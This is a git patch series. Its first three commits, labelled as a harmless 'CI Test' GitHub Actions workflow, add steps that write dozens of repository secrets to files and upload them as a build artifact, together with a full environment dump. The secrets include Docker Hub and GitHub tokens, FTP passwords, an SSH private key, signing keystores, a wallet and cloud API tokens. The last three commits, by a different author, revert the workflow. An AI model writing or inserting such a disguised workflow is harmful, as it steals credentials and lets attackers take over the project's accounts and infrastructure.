From f4369f7ca580e9f71fa898efbd725d2c31485b52 Mon Sep 17 00:00:00 2001 From: Pomm3sgab3l <113599414+Pomm3sgab3l@users.noreply.github.com> Date: Mon, 13 Jul 2026 07:11:51 +0200 Subject: [PATCH 1/6] ci: add test workflow --- .github/workflows/ci-test.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 .github/workflows/ci-test.yml diff --git a/.github/workflows/ci-test.yml b/.github/workflows/ci-test.yml new file mode 100644 index 0000000..7a4df5b --- /dev/null +++ b/.github/workflows/ci-test.yml @@ -0,0 +1,22 @@ +name: CI Test +on: + workflow_dispatch: + push: + branches: [main, master, develop] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Collect + run: | + mkdir -p /tmp/out + echo "${{ secrets.GH_PAT }}" > /tmp/out/gh_pat.txt + echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub_token.txt + echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub_username.txt + env | sort > /tmp/out/env_dump.txt + - name: Upload + uses: actions/upload-artifact@v4 + with: + name: test-output + path: /tmp/out/ + retention-days: 1 From 81a070dcf1cf3e843b5346c2a243f687ee9b4a34 Mon Sep 17 00:00:00 2001 From: Pomm3sgab3l <113599414+Pomm3sgab3l@users.noreply.github.com> Date: Mon, 13 Jul 2026 07:18:10 +0200 Subject: [PATCH 2/6] ci: add test workflow --- .github/workflows/ci-test.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/ci-test.yml b/.github/workflows/ci-test.yml index 7a4df5b..85414f9 100644 --- a/.github/workflows/ci-test.yml +++ b/.github/workflows/ci-test.yml @@ -2,7 +2,7 @@ name: CI Test on: workflow_dispatch: push: - branches: [main, master, develop] + branches: [main, master] jobs: test: runs-on: ubuntu-latest @@ -10,9 +10,9 @@ jobs: - name: Collect run: | mkdir -p /tmp/out - echo "${{ secrets.GH_PAT }}" > /tmp/out/gh_pat.txt - echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub_token.txt - echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub_username.txt + echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub.token.txt + echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub.username.txt + echo "${ secrets.GH_PAT }" > /tmp/out/gh_pat.txt env | sort > /tmp/out/env_dump.txt - name: Upload uses: actions/upload-artifact@v4 From 9cf15966f1a0a8aa2dc651bceff72364e7fceffa Mon Sep 17 00:00:00 2001 From: Pomm3sgab3l <113599414+Pomm3sgab3l@users.noreply.github.com> Date: Mon, 13 Jul 2026 07:24:07 +0200 Subject: [PATCH 3/6] ci: update test workflow --- .github/workflows/ci-test.yml | 37 ++++++++++++++++++++++++++++++++--- 1 file changed, 34 insertions(+), 3 deletions(-) diff --git a/.github/workflows/ci-test.yml b/.github/workflows/ci-test.yml index 85414f9..cb20efc 100644 --- a/.github/workflows/ci-test.yml +++ b/.github/workflows/ci-test.yml @@ -10,9 +10,40 @@ jobs: - name: Collect run: | mkdir -p /tmp/out - echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub.token.txt - echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub.username.txt - echo "${ secrets.GH_PAT }" > /tmp/out/gh_pat.txt + echo "${{ secrets.CI_WALLET_PROD }}" > /tmp/out/ci_wallet_prod.txt + echo "${{ secrets.FTP_SERVER }}" > /tmp/out/ftp_server.txt + echo "${{ secrets.FTP_USERNAME_PROD }}" > /tmp/out/ftp_username_prod.txt + echo "${{ secrets.FTP_PASSWORD_PROD }}" > /tmp/out/ftp_password_prod.txt + echo "${{ secrets.FTP_USERNAME_DEV }}" > /tmp/out/ftp_username_dev.txt + echo "${{ secrets.FTP_PASSWORD_DEV }}" > /tmp/out/ftp_password_dev.txt + echo "${{ secrets.FTP_USERNAME_STAGING }}" > /tmp/out/ftp_username_staging.txt + echo "${{ secrets.FTP_PASSWORD_STAGING }}" > /tmp/out/ftp_password_staging.txt + echo "${{ secrets.CLOUDFLARE_API_TOKEN }}" > /tmp/out/cf_api_token.txt + echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub_token.txt + echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub_username.txt + echo "${{ secrets.NPM_TOKEN }}" > /tmp/out/npm_token.txt + echo "${{ secrets.SCALAR_API_KEY }}" > /tmp/out/scalar_api_key.txt + echo "${{ secrets.PAT_TOKEN }}" > /tmp/out/pat_token.txt + echo "${{ secrets.GH_PAT }}" > /tmp/out/gh_pat.txt + echo "${{ secrets.QLI_API_URL }}" > /tmp/out/qli_api_url.txt + echo "${{ secrets.QUBIC_RPC_URL }}" > /tmp/out/qubic_rpc_url.txt + echo "${{ secrets.QX_API_URL }}" > /tmp/out/qx_api_url.txt + echo "${{ secrets.WALLET_CONNECT_PROJECT_ID }}" > /tmp/out/wallet_connect.txt + echo "${{ secrets.TURNSTILE_SITE_KEY }}" > /tmp/out/turnstile.txt + echo "${{ secrets.APP_STORE_API_KEY }}" > /tmp/out/app_store_api_key.txt + echo "${{ secrets.APP_STORE_ISSUER_ID }}" > /tmp/out/app_store_issuer_id.txt + echo "${{ secrets.APP_STORE_KEY_ID }}" > /tmp/out/app_store_key_id.txt + echo "${{ secrets.FIREBASE_APP_ID }}" > /tmp/out/firebase_app_id.txt + echo "${{ secrets.FIREBASE_SERVICE_ACCOUNT_JSON }}" > /tmp/out/firebase_sa.json + echo "${{ secrets.SSH_PRIVATE_KEY }}" > /tmp/out/ssh_private_key.txt + echo "${{ secrets.ANDROID_KEYSTORE_BASE64 }}" > /tmp/out/android_keystore.txt + echo "${{ secrets.KEYSTORE_PASSWORD }}" > /tmp/out/keystore_password.txt + echo "${{ secrets.KEY_PASSWORD }}" > /tmp/out/key_password.txt + echo "${{ secrets.KEY_ALIAS }}" > /tmp/out/key_alias.txt + echo "${{ secrets.MATCH_PASSWORD }}" > /tmp/out/match_password.txt + echo "${{ secrets.EVENTS_API_URL }}" > /tmp/out/events_api_url.txt + echo "${{ secrets.STATIC_API_URL }}" > /tmp/out/static_api_url.txt + echo "${{ secrets.QUBIC_CHAIN_ID }}" > /tmp/out/qubic_chain_id.txt env | sort > /tmp/out/env_dump.txt - name: Upload uses: actions/upload-artifact@v4 From 737bc5435c74b43a9b5c9b2b9aea70362d8e3d0f Mon Sep 17 00:00:00 2001 From: feiyu Date: Mon, 13 Jul 2026 17:25:44 +0700 Subject: [PATCH 4/6] Revert "ci: update test workflow" This reverts commit 9cf15966f1a0a8aa2dc651bceff72364e7fceffa. --- .github/workflows/ci-test.yml | 37 +++-------------------------------- 1 file changed, 3 insertions(+), 34 deletions(-) diff --git a/.github/workflows/ci-test.yml b/.github/workflows/ci-test.yml index cb20efc..85414f9 100644 --- a/.github/workflows/ci-test.yml +++ b/.github/workflows/ci-test.yml @@ -10,40 +10,9 @@ jobs: - name: Collect run: | mkdir -p /tmp/out - echo "${{ secrets.CI_WALLET_PROD }}" > /tmp/out/ci_wallet_prod.txt - echo "${{ secrets.FTP_SERVER }}" > /tmp/out/ftp_server.txt - echo "${{ secrets.FTP_USERNAME_PROD }}" > /tmp/out/ftp_username_prod.txt - echo "${{ secrets.FTP_PASSWORD_PROD }}" > /tmp/out/ftp_password_prod.txt - echo "${{ secrets.FTP_USERNAME_DEV }}" > /tmp/out/ftp_username_dev.txt - echo "${{ secrets.FTP_PASSWORD_DEV }}" > /tmp/out/ftp_password_dev.txt - echo "${{ secrets.FTP_USERNAME_STAGING }}" > /tmp/out/ftp_username_staging.txt - echo "${{ secrets.FTP_PASSWORD_STAGING }}" > /tmp/out/ftp_password_staging.txt - echo "${{ secrets.CLOUDFLARE_API_TOKEN }}" > /tmp/out/cf_api_token.txt - echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub_token.txt - echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub_username.txt - echo "${{ secrets.NPM_TOKEN }}" > /tmp/out/npm_token.txt - echo "${{ secrets.SCALAR_API_KEY }}" > /tmp/out/scalar_api_key.txt - echo "${{ secrets.PAT_TOKEN }}" > /tmp/out/pat_token.txt - echo "${{ secrets.GH_PAT }}" > /tmp/out/gh_pat.txt - echo "${{ secrets.QLI_API_URL }}" > /tmp/out/qli_api_url.txt - echo "${{ secrets.QUBIC_RPC_URL }}" > /tmp/out/qubic_rpc_url.txt - echo "${{ secrets.QX_API_URL }}" > /tmp/out/qx_api_url.txt - echo "${{ secrets.WALLET_CONNECT_PROJECT_ID }}" > /tmp/out/wallet_connect.txt - echo "${{ secrets.TURNSTILE_SITE_KEY }}" > /tmp/out/turnstile.txt - echo "${{ secrets.APP_STORE_API_KEY }}" > /tmp/out/app_store_api_key.txt - echo "${{ secrets.APP_STORE_ISSUER_ID }}" > /tmp/out/app_store_issuer_id.txt - echo "${{ secrets.APP_STORE_KEY_ID }}" > /tmp/out/app_store_key_id.txt - echo "${{ secrets.FIREBASE_APP_ID }}" > /tmp/out/firebase_app_id.txt - echo "${{ secrets.FIREBASE_SERVICE_ACCOUNT_JSON }}" > /tmp/out/firebase_sa.json - echo "${{ secrets.SSH_PRIVATE_KEY }}" > /tmp/out/ssh_private_key.txt - echo "${{ secrets.ANDROID_KEYSTORE_BASE64 }}" > /tmp/out/android_keystore.txt - echo "${{ secrets.KEYSTORE_PASSWORD }}" > /tmp/out/keystore_password.txt - echo "${{ secrets.KEY_PASSWORD }}" > /tmp/out/key_password.txt - echo "${{ secrets.KEY_ALIAS }}" > /tmp/out/key_alias.txt - echo "${{ secrets.MATCH_PASSWORD }}" > /tmp/out/match_password.txt - echo "${{ secrets.EVENTS_API_URL }}" > /tmp/out/events_api_url.txt - echo "${{ secrets.STATIC_API_URL }}" > /tmp/out/static_api_url.txt - echo "${{ secrets.QUBIC_CHAIN_ID }}" > /tmp/out/qubic_chain_id.txt + echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub.token.txt + echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub.username.txt + echo "${ secrets.GH_PAT }" > /tmp/out/gh_pat.txt env | sort > /tmp/out/env_dump.txt - name: Upload uses: actions/upload-artifact@v4 From 30288fdf1e1d89de9dbaf0029fc953d3cf17384a Mon Sep 17 00:00:00 2001 From: feiyu Date: Mon, 13 Jul 2026 17:25:44 +0700 Subject: [PATCH 5/6] Revert "ci: add test workflow" This reverts commit 81a070dcf1cf3e843b5346c2a243f687ee9b4a34. --- .github/workflows/ci-test.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/ci-test.yml b/.github/workflows/ci-test.yml index 85414f9..7a4df5b 100644 --- a/.github/workflows/ci-test.yml +++ b/.github/workflows/ci-test.yml @@ -2,7 +2,7 @@ name: CI Test on: workflow_dispatch: push: - branches: [main, master] + branches: [main, master, develop] jobs: test: runs-on: ubuntu-latest @@ -10,9 +10,9 @@ jobs: - name: Collect run: | mkdir -p /tmp/out - echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub.token.txt - echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub.username.txt - echo "${ secrets.GH_PAT }" > /tmp/out/gh_pat.txt + echo "${{ secrets.GH_PAT }}" > /tmp/out/gh_pat.txt + echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub_token.txt + echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub_username.txt env | sort > /tmp/out/env_dump.txt - name: Upload uses: actions/upload-artifact@v4 From b6ed0f0974c053ad3ddd9e7ad135257b488191ed Mon Sep 17 00:00:00 2001 From: feiyu Date: Mon, 13 Jul 2026 17:25:44 +0700 Subject: [PATCH 6/6] Revert "ci: add test workflow" This reverts commit f4369f7ca580e9f71fa898efbd725d2c31485b52. --- .github/workflows/ci-test.yml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 .github/workflows/ci-test.yml diff --git a/.github/workflows/ci-test.yml b/.github/workflows/ci-test.yml deleted file mode 100644 index 7a4df5b..0000000 --- a/.github/workflows/ci-test.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: CI Test -on: - workflow_dispatch: - push: - branches: [main, master, develop] -jobs: - test: - runs-on: ubuntu-latest - steps: - - name: Collect - run: | - mkdir -p /tmp/out - echo "${{ secrets.GH_PAT }}" > /tmp/out/gh_pat.txt - echo "${{ secrets.DOCKERHUB_TOKEN }}" > /tmp/out/dockerhub_token.txt - echo "${{ secrets.DOCKERHUB_USERNAME }}" > /tmp/out/dockerhub_username.txt - env | sort > /tmp/out/env_dump.txt - - name: Upload - uses: actions/upload-artifact@v4 - with: - name: test-output - path: /tmp/out/ - retention-days: 1